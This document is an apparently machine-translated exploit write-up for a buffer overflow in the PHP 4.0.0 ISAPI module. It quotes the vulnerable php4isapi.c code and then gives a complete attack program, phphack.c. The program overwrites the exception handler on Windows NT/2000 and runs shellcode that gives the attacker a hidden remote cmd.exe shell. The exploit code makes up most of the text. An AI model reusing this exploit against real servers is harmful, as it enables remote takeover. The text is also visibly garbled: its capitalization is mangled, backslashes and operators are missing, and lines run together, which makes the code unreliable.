When PHP4.0.0 came out, we tested that PHP4isasp.dll had buffering vulnerabilities, the following is the relevant source code for php4isapi.c:
Static void SAPI_ISAPI_REGISTER_SERVER_VARIABLES (ZVAL * TRACK_VARS_ARRAY ELS_DC SLS_DC PLS_DC)
{
Char static_variable_buf [isapi_server_var_buf_size];
CHAR * VARIABLE_BUF;
DWORD VARIABLE_LEN = isapi_server_var_buf_size;
CHAR * VARIABLE;
Char * strtok_buf = NULL;
LPEXTENSION_CONTROL_BLOCK LPECB;
Char ** p = isapi_server_variables;
LPECB = (LPEXTENSION_CONTROL_BLOCK) SG (Server_Context);
/ * Register the standard isapi variables * /
While (* p) {
VARIABLE_LEN = isapi_server_var_buf_size;
IF (lpecb-> getServerVariable (lpecb-> connid, * p, static_variable_buf, & variable_len)
&& stat_variable_buf [0]) {
PHP_REGISTER_VARIABLE (* p, static_variable_buf, track_vars_array els_cc pls_cc);
Else IF (getLastError () == Error_INSUFFICIENT_BUFFER) {
Variable_buf = (char *) Emalloc (variable_len);
IF (LPECB-> GetSerVariable (lpecb-> connid, * p, variable_buf, & variable_len)
&& variable_buf [0]) {
PHP_REGISTER_VARIABLE (* p, variable_buf, track_vars_array els_cc pls_cc);
}
Efree (variable_buf);
}
P ;
}
/ * Php_self support * /
#ifdef with_zeus
IF (LPECB-> GetSerVariable (LPECB-> ConnID, "Path_INFO", Static_Variable_buf, & variable_len
#ELSE
IF (LPECB-> GetSerVariable (LPECB-> ConnID, "Script_name", Static_Variable_buf, & variable_len)
/ * PHP4.0.0 Vulnerability is located, buffering overflow. At this time, the variable_len variable is already the last call GetServerVariable return variable * /
/ * Php4.0.3 has been repaired * /
#ENDIF
&& stat_variable_buf [0]) {
PHP_REGISTER_VARIABLE ("PHP_SELF", Static_Variable_buf, TRACK_VARS_ARRAY ELS_CC PLS_CC);
/ *
Because the shape is covered, this shape is also difficult to forge, so the traditional overflow attack is invalid because this call cannot return, but we can use an abnormal structure attack, you can see my related articles.
* /
}
/ * Register the intence bits of all_http * /
VARIABLE_LEN = isapi_server_var_buf_size;
IF (LPECB-> GetServerVariable (LPECB-> ConnID, "All_HTTP", Static_Variable_buf, & variable_len) {
Variable_buf = static_variable_buf;
} else {
IF (getLastError () == Error_INSUFFICIENT_BUFFER {
Variable_buf = (char *) Emalloc (variable_len);
IF (! lpecb-> getServerVariable (LPECB-> ConnID, "All_http", variable_buf, & variable_len) {
Efree (variable_buf);
Return;
}
} else {
Return;
}
}
Variable = php_strtok_r (variable_buf, "/ r / n", & setok_buf);
While (variable) {
Char * colon = strchr (variable, ':');
IF (colon) {
CHAR * VALUE = COLON 1;
While (* value == '') {
Value ;
}
* colon = 0;
PHP_REGISTER_VARIABLE (Variable, Value, Track_vars_Array ELS_CC PLS_CC);
* colon = ':';
}
Variable = php_strtok_r (NULL, "/ R / N", & Strtok_buf);
}
IF (variable_buf! = static_variable_buf) {
Efree (variable_buf);
}
}
Because of the problem of the formation, the use of the covered exception handling structure allows the shellcode code to be controlled. However, because the abnormal structure code is relatively uniform, it may be necessary to adjust the relevant parameters based on the Windows version of the attacked system. Specific Attack Test Code:
/ *
PHP4.0 overflow program phphack.c Ver 1.0
Copy by yuan
* /
#include
#include
#include
#include
// #define debug
// # Define reteipaddr Eipwin2000
#define fnendlong 0x08
#define nopcode 'b' // inc Edx 0x90
#define noplong 0x3c
#define buffsize 0x20000
#define reteipaddress 0x900 4
#define shellbuffsize 0x800
#define shellfnnums 9 # define dataxorcode 0xAA
#define lockbignum 19999999
#define LockBignum2 13579139
#define shellport 0x1f90 // 0x1f90 = 8080
#define Webport 80
Void shellcodefnlock ();
Void shellcodefn (char * ecb);
Void Cleanchkesp (Char * Fnadd, Char * Shellbuff, Char * Chkespadd, Int Len)
INT main (int Argc, char ** argv)
{
Char * server;
Char * str = "loadLibrarya" "/ x0" "createpipe" "/ x0"
"CreateProcessa" "/ x0" "closehandle" "/ x0"
"Peeknamedpipe" "/ x0"
"Readfile" "/ x0" "Writefile" "/ x0"
"Sleep" "/ x0"
"cmd.exe" "/ x0" "/ x0d / x0a" "it" "/ x0d / x0a" "/ x0"
"Xordata" "/ x0"
"strend";
CHAR BUFF1 [] = "get /default.php4";
Char buff2 [] = "http / 1.1 / nhost:";
Char * fnendstr = "/ x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90 / x90";
CHAR SRLF [] = "/ x0d / x0a / x00 / x00";
Char Eipjmpesp [] = "/ xb7 / x0e / xfa / x7f";
// Push ESP
// Ret
Char energyxcept [] = "/ xb8 / x0e / xfa / x7f";
// Ret
Char Eipjmpesi [] = "/ x08 / x88 / xfa / x7f";
Char Eipjmpedi [] = "/ xbe / x8b / xfa / x7f";
Char Eipjmpebx [] = "/ x73 / x67 / xfa / x7f";
// push ebx
// Ret
/ *
JMP EBX function code address, Chinese Winnt, Chinese Win2000 this address fixed
This is in a c_936.nls module
When Win2000 occurs an exception call exception handling structure code, EBX points to anomalous structure. The old version of Winnt is ESI, available 7FFA8808, which is EDI, and 7FFA8BBE can be used.
* /
CHAR BUFF [Buffsize];
Char recvbuff [buffsize];
Char shellcodebuff [0x1000];
Struct SockAddr_in S_IN2, S_IN3;
Struct hostent * he;
Char * shellcodefnadd, * chkespadd;
Unsigned int sendpacketlong;
// unsigned
INT I, J, K;
UNSIGNED CHAR TEMP;
Int fd; u_short port, port1, shellcodeport;
Socket D_IP;
Wsadata wsadata;
INT OFFSET = 0;
Int xordaBegin;
INT LOCKINTVAR1, LOCKINTVAR2;
Char Lockcharvar;
INT OVERADD = Reteipaddress;
Int result;
FPRINTF (stderr, "/ n php4.0 for win32 overflow program 2.0.");
FPRINTF (stderr, "/ n copy by yuan 2000.8.16.");
FPrintf (stderr, "/ n wellcome to my homepage http://yuange.yeah.net.");
FPRINTF (stderr, "/ n welcome to http://www.nsfocus.com.");
FPRINTF (stderr, "/ n usage:% s
IF (argc <2) {
FPRINTF (stderr, "/ n please enter the web server:");
Gets (recvbuff);
For (i = 0; i IF (Recvbuff [I]! = ') Break; } Server = Recvbuff; IF (i / * FPRINTF (stderr, "/ n please enter the offset (0-3):"); Gets (buff); For (i = 0; i IF (buff [I]! = ') Break; } OFFSET = ATOI (BUFF I); * / } Result = WSASTARTUP (Makeword (1, 1), & WSADATA); IF (Result! = 0) { FPRINTF (stderr, "Your Computer Was Not Connected" "To the Internet at the time That" "this program was launched, or you" "Do Not Have A 32-bit" "Connection to the Internet."); Exit (1); } / * IF (argc> 2) { OFFSET = ATOI (Argv [2]); } Overadd = offset; IF (Offset <0 || Offset> 3) { FPRINTF (stderr, "/ n offset error! offset 0 - 3."); Gets (buff); Exit (1); } * / IF (argc <2) { // wsacleanup (); // EXIT (1); } Else Server = argv [1]; For (i = 0; i IF (Server [i]! = ') Break; } IF (i IF (Server [i] == ':') { IF (Server [i 1] == '//' || Server [i 1] == '/') { IF (Server [i 2] == '//' || Server [i 2] == '/') { Server = i; Server = 3; Break; } } } } For (i = 1; i <= strlen (server); i) { IF (Server [i-1] == '//' || Server [i-1] == '/') Server [i-1] = 0; } D_IP = inet_addr (server); IF (D_IP == - 1) { He = gethostByname (Server); IF (! HE) { WSACLEANUP (); Printf ("/ n can't get the ip of% s! / n", server); Gets (buff); Exit (1); } Else Memcpy (& D_IP, HE-> H_ADDR, 4); } IF (Argc> 2) Port = ATOI (Argv [2]); Else Port = Webport; IF (port == 0) Port = Webport; FD = Socket (AF_INET, SOCK_STREAM, 0); i = 8000; Setsockopt (FD, SOL_SOCKET, SO_RCVTIMEO, (Const Char *) & I, SizeOf (i)); S_IN3.SIN_FAMILY = AF_INET; S_IN3.SIN_PORT = HTONS (Port); S_IN3.SIN_ADDR.S_ADDR = D_IP; Printf ("/ N Nuke IP:% S Port% D", INET_NTOA (S_IN3.SIN_ADDR), HTONS (S_IN3.SIN_PORT)); IF (Connect (FD, (Struct SockAddr *) & S_IN3, SIZEOF (Struct SockAddr_in))! = 0) { CloseSocket (FD); WSACLEANUP (); FPRINTF (stderr, "/ n connect err."); Gets (buff); Exit (1); } _asm { MOV ESI, ESP CMP ESI, ESP } _chkesp (); Chuestspadd = _chkesp; Temp = * chuest; IF (Temp == 0xE9) { chuesthant I = * (int *) Chuestion; Chkespadd = i; Chkespadd = 4; } Shellcodefnadd = shellcodefnlock; Temp = * shellcodefnadd; IF (Temp == 0xE9) { shellcodefnadd; K = * (int *) shellcodefnadd; Shellcodefnadd = K; shellcodefnadd = 4; } For (k = 0; k <= 0x500; k) { IF (MemcMP (Shellcodefnadd K, Fnendstr, Fnendlong) == 0) Break; } MEMSET (BUFF, NOPCODE, BUFFSIZE); IF (argc> 4) { Memcpy (buff, Argv [4], Strlen (Argv [4])); } Else Memcpy (Buff, Buff1, Strlen); // strcpy (buff, buff1); // MEMSET (Buff), Nopcode, 1); Memcpy (buff Overadd 0x60 Noplong, shellcodefnadd k 4,0x80); // Memcpy (buff noplong, shellcodefnadd k 4, 0x80); Shellcodefnadd = shellcodefn; Temp = * shellcodefnadd; IF (Temp == 0xE9) { shellcodefnadd; K = * (int *) shellcodefnadd; Shellcodefnadd = K; Shellcodefnadd = 4; } For (k = 0; k <= 0x1000; k) { IF (MemcMP (Shellcodefnadd K, Fnendstr, Fnendlong) == 0) Break; } Memcpy (shellcodeBuff, shellcodefnadd, k); // j); Cleanchkesp (Shellcodefnadd, ShellcodeBuff, ChkespAdd, K); FOR (i = 0; i <0x400; i) { IF (Memcmp (STR I, "Strend", 6) == 0) Break; } Memcpy (ShellcodeBuff K, STR, I); SendPacketlong = K i; For (k = 0; k <= 0x200; k) { IF (MemcMP (Buff Overadd Noplong K, Fnendstr, Fnendlong) == 0) Break; // IF (Memcmp (Buff Noplong K, Fnendstr, Fnendlong) == 0) Break; } For (i = 0; i Temp = shellcodebuff [i]; Temp = DataXorcode; IF (Temp <= 0x10 || Temp == '"|| Temp ==' / '|| Temp ==' // '|| Temp ==' 0 '|| Temp = = '?' || Temp == '%') { BUF [OVERADD NOPLONG K] = '0'; // buff [Noplong K] = '0'; K; TEMP = 0x40;} BUF [OVERADD NOPLONG K] = TEMP; // buff [Noplong K] = TEMP; K; } // Memcpy (Buff Overadd Noplong K, ShellcodeBuff, SendPacketLong); // k = sendpacketlong; / * FOR (i = -0x30; i <0x30; i = 4) { Memcpy (buff Overadd i, EIPEXCEPT, 4); } Memcpy (Buff Overadd i, Eipjmpesp, 4); * / For (i = -40; i <0x40; i = 8) { Memcpy (buff Overadd I, "/ X42 / X42 / X42 / X2D", 4); Memcpy (buff Overadd i 4, Eipjmpebx, 4); } Memcpy (buff Overadd i 8, "/ X42 / X42 / X42 / X42 / X61 / X61 / X61 / X61 / X61 / X61 / X61 / X61 / X61 / X5B / XFF / X63 / X64 / X42 / X42 / X42 / X42 ", 24); // fprintf (stderr, "/ n Offset:% D", OFFSET); / * 192.168.8.48 IF (argc> 2) { Server = argv [2]; IF (STRCMP (Server, "WIN9X") == 0) { Memcpy (buff Overadd, EIPWIN9X, 4); FPRINTF (stderr, "/ n nuke Win9x."); } IF (STRCMP (Server, "Winnt") == 0) { Memcpy (buff Overradd, EIPWINNT, 4); FPRINTF (stderr, "/ n nuke winnt."); } } * / Sendpacketlong = K Overadd i Noplong; // sendpacketlong = k noplong; STRCPY (Buff SendPacketlong, BUFF2); STRCPY (BUFF SendPacketlong Strlen (BUFF2), Server); Sendpacketlong = Strlen (BUFF); // buff [sendpacketlong] = 0x90; STRCPY (BUFF SendPacketlong, "/ N / N"); / * BUF [SendPacketlong] = 0x90; FOR (i = -0x30; i <0x30; i = 4) { Memcpy (buff SendPacketlong Overadd i, EIPEXCEPT, 4); } Memcpy (Buff SendPacketlong Overadd I, EIPWINNT, 4); STRCPY (Buff SendPacketlong Overadd i 4, "/ XFF / X63 / X64"); STRCPY (Buff SendPacketlong Overadd i 20, "/ N / N"); * / // Printf ("/ N Send Buff: / N% S", BUFF); // STRCPY (BUFF OVERADD NOPLONG, Shellcode); Sendpacketlong = Strlen (BUFF); / * #ifdef debug _asm { LEA ESP, BUFF Add ESP, OVERADD RET } #ENDIF * / IF (argc> 6) { IF (strCMP (Argv [6], "Debug") == 0) { _asm { LEA ESP, BUFF Add ESP, OVERADD RET } } } XORDATABEGIN = 0; FOR (i = 0; i <1; i) { J = sendpacketlong; FPRINTF (stderr, "/ n send packet% d bytes.", J); // fprintf (stderr, "/ n SNED: / N% S", BUFF); Send (FD, BUFF, J, 0); K = RECV (FD, Recvbuff, 0x1000, 0); IF (K> = 8 && Memcmp (Recvbuff, "XORDATA", 8) == 0) { XORDATABEGIN = 1; K = -1; FPRINTF (stderr, "/ n ok! / n"); } IF (k> 0) { RECVBUFF [K] = 0; FPRINTF (stderr, "/ n recv: / n% s", recvbuff); } } K = 1; IOCTLSocket (FD, Fionbio, & K); // fprintf (stderr, "/ n now begin: / n"); Lockintvar1 = lockbignum2% LockBignum; Lockintvar2 = Lockintvar1; / * For (i = 0; i SRLF [I] ^ = DataXorcode; } Send (FD, SRLF, STRLEN (SRLF), 0); Send (FD, SRLF, STRLEN (SRLF), 0); Send (FD, SRLF, STRLEN (SRLF), 0); * / K = 1; While (k! = 0) { IF (k <0) { Gets (buff); K = Strlen (BUFF); Memcpy (buff K, SRLF, 3); // Send (FD, SRLF, Strlen (SRLF), 0); // fprintf (stderr, "% s", buff); For (i = 0; i Lockintvar2 = lockintvar2 * 0x100; Lockintvar2 = lockintvar2% LockBignum; LockCharvar = Lockintvar2% 0x100; BUFF [I] ^ = LOCKCHARVAR; // DataXorcode; // buff [i] ^ = DataXorcode; } Send (FD, BUFF, K 2, 0); // Send (FD, SRLF, Strlen (SRLF), 0); } K = RECV (FD, BUFF, 0X1000, 0); IF (xordATABEGIN == 0 && K> = 8 && Memcmp (buff, "xordata", 8) == 0) {xordatabegin = 1; K = -1; } IF (k> 0) { // fprintf (stderr, "rv% D Bytes", K); IF (xordATABEGIN == 1) { For (i = 0; i Lockintvar1 = Lockintvar1 * 0x100; Lockintvar1 = lockintvar1% LockBignum; Lockcharvar = lockintvar1% 0x100; BUFF [I] ^ = LOCKCHARVAR; // DataXorcode; } } BUFF [K] = 0; FPRINTF (stderr, "% s", buff); } // IF (k == 0) Break; } CloseSocket (FD); WSACLEANUP (); FPRINTF (stderr, "/ n the server close connect."); Gets (buff); Return (0); } Void shellcodefnlock () { _asm { NOP NOP NOP NOP NOP NOP NOP NOP _emit ('.') _emit ('p') _emit ('h') _emit ('p') _emit ('4') _emit ('?') JMP next GetIAdd: Pop Edi Push EDI POP ESI Push EBX // ECB Push EBX // Call Shellcodefn Ret Address XOR ECX, ECX LOOPLOCK: LODSB CMP AL, CL JZ Shell CMP Al, 0x30 JZ Clean0 Sto: xor al, DataXorcode Stosb JMP LOOPLOCK Clean0: Lodsb SUB Al, 0x40 JMP STO Next: Call getEDiadd Shell: NOP NOP NOP NOP NOP NOP NOP NOP } } Void shellcodefn (char * ecb) {Char Buff [shellbuffsize 2]; INT * EXCEPT [2]; FarProc SleepAdd; FarProc WritefileAdd; FarProc ReadfileAdd; FarProc PeeknamedpiPireAdd; FarProc CloseHandD; FarProc CreateProcessAdd; FarProc CreatePipeAdd; FarProc ProcloadLib; FarProc APIFNADD [1]; FarProc ProcgetAdd = 0; FARPROC WRITECLIENT = * (int *) (ECB 0x84); FarProc ReadClient = * (int *) (ECB 0x88); HCONN Connid = * (int *) (ECB 8); Char * stradd; INT IMGBASE, FNBASE, K, L Handle Lionle; // LibWSOCK32; Startupinfo SiINFO; PROCESS_INFORMATION processinformation; Handle Hreadpipe1, hwritepipe1, hreadpipe2, hwritepidipe2; INT LBYTESREAD; INT LOCKINTVAR1, LOCKINTVAR2; Char Lockcharvar; Security_attributes sa; _asm {JMP nextcall GetStradd: Pop Stradd Lea Edi, Except Mov DWORD PTR FS: [0], EDI } Except [0] = 0xfffffffff; Except [1] = stradd-0x07; IMGBase = 0x77E00000; _asm { Call getExceptretadd } For (; imgbase <0xBFFA0000, ProcgetAdd == 0;) { IMGBase = 0x10000; IF (imgbase == 0x78000000) IMGBase = 0xBff00000; IF (* (Word *) IMGBASE == 'ZM' && * (IMGBASE * (INT *) == 'EP') { Fnbase = * (int *) (IMGBASE * (INT *) 0x78) IMGBASE; K = * (int *) (fnbase 0xc) IMGBASE; IF (* (int *) k == 'NREK' && * (int *) (k 4) == '23LE') { LibHandle = IMGBASE; K = IMGBASE * (INT *) (FNBase 0x20); For (l = 0; l <* (int *) (fnbase 0x18); L, K = 4) { IF (* (INT *) (IMGBASE * (INT *) K) == PTEG '&& * (INT *) (4 IMGBase * (INT *) K) ==' acor ' { K = * (Word *) (L L IMGBASE * (INBASE 0x24)); K = * (int *) (fnbase 0x10) -1; K = * (int *) (K K K K IMGBASE * (INT *) (FNBase 0x1c)); ProcgetAdd = K IMGBASE; Break; } } } } } // Search Kernel32. DLL module address and API function getProcAddress address / (Note that this is not in the case where the search page is processed. IF (procgetadd == 0) goto die; FOR (k = 1; k Apifnadd [k] = procgetadd (libhandle, stradd); For (;; stradd) { IF (* (stradd) == 0 && * (stradd 1)! = 0) Break; } stradd; } Sa.nlength = 12; Sa.lpsecurityDescriptor = 0; Sa.binherithandle = true; CreatePipeadd (& Hreadpipe1, & HwritePipe1, & Sa, 0); CreatePipeadd (& Hreadpipe2, & HwritePipe2, & Sa, 0); // ZeromeMory (& SiInfo, SIZEOF (SIINFO); _asm { Lea Edi, SIINFO XOR EAX, EAX MOV ECX, 0x11 RepNZ Stosd } Siinfo.dwflags = startf_useshowwindow | Startf_usestdhandles; SiINFO.WSHOWINDOW = SW_HIDE; SiINFO.HSTDINPUT = HREADPIPE2; SiINFO.HSTDOUTPUT = hwritepidipe1; SiINFO.HSTDERROR = hwritepidipe1; K = 0; // while (k == 0) // { K = CreateProcessAdd (NULL, STRADD, NULL, NULL, 1, 0, NULL, NULL, & SIINFO, & ProcessInformation); STRADD = 8; //} Peeknamedpipeadd (Hreadpipe1, Buff, Shellbuffsize, & lbytesRead, 0, 0); K = 8; WriteClient (Connid, Stradd 9, & K, 0); Lockintvar1 = lockbignum2% LockBignum; Lockintvar2 = Lockintvar1; While (1) { Peeknamedpipeadd (Hreadpipe1, Buff, Shellbuffsize, & lbytesRead, 0, 0); IF (LbytesRead> 0) { Readfileadd (Hreadpipe1, Buff, LbytesRead, & lbytesread, 0); IF (LbytesRead> 0) { FOR (k = 0; k Lockintvar2 = lockintvar2 * 0x100; Lockintvar2 = lockintvar2% LockBignum; LockCharvar = Lockintvar2% 0x100; BUFF [K] ^ = LOCKCHARVAR; // DataXorcode; // buff [k] ^ = DataXorcode; } WriteClient (Connid, Buff, & lbytesRead, 0); // hse_io_sync); } } Else { Lbytesread = shellbuffsize; K = ReadClient (ConnID, BUFF, & LBYTESREAD); IF (k! = 1) { K = 8; WritefileAdd (hwritepipe2, stradd, k, & k, 0); // exit cmd.exe WritefileAdd (hwritepipe2, stradd, k, & k, 0); // exit cmd.exewritefileadd (hwritepipe2, stradd, k, & k, 0); // EXIT cmd.exe While (1) { SleepAdd (0x7ffffff); // is dead } } Else { FOR (k = 0; k Lockintvar1 = Lockintvar1 * 0x100; Lockintvar1 = lockintvar1% LockBignum; Lockcharvar = lockintvar1% 0x100; BUFF [K] ^ = LOCKCHARVAR; // DataXorcode; // buff [k] ^ = DataXorcode; } WritefileAdd (hwritepipe2, buff, lbytesread, & lbytead, 0); // SleepAdd (1000); } } } Die: Goto Die; _asm { getExceptretadd: POP EAX Push EAX MOV EDI, DWORD PTR [stradd] MOV DWORD PTR [EDI-0X0E], EAX RET Errprogram: MOV Eax, DWORD PTR [ESP 0x0c] Add Eax, 0xB8 Mov DWORD PTR [EAX], 0x11223344 // stradd-0xe XOR Eax, EAX / / 2 Ret // 1 ExecptProgram: JMP errprogram // 2 bytes stradd-7 NextCall: Call getstradd //5 bytes NOP NOP NOP NOP NOP NOP NOP NOP NOP } } Void Cleanchkesp (Char * Fnadd, Char * Shellbuff, Char * Chkesp, Int Len) { INT I, K; UNSIGNED CHAR TEMP; Char * Calladd; For (i = 0; i Temp = shellbuff [i]; IF (temp == 0xe8) { K = * (int *) (shellbuff i 1); Calladd = fnadd; Calladd = k; Calladd = i; Calladd = 5; IF (calladd == chkesp) { Shellbuff [I] = 0x90; ShellBuff [i 1] = 0x43; // incn Shellbuff [i 2] = 0x4b; // DEC EBX Shellbuff [i 3] = 0x43; Shellbuff [i 4] = 0x4b; } } } }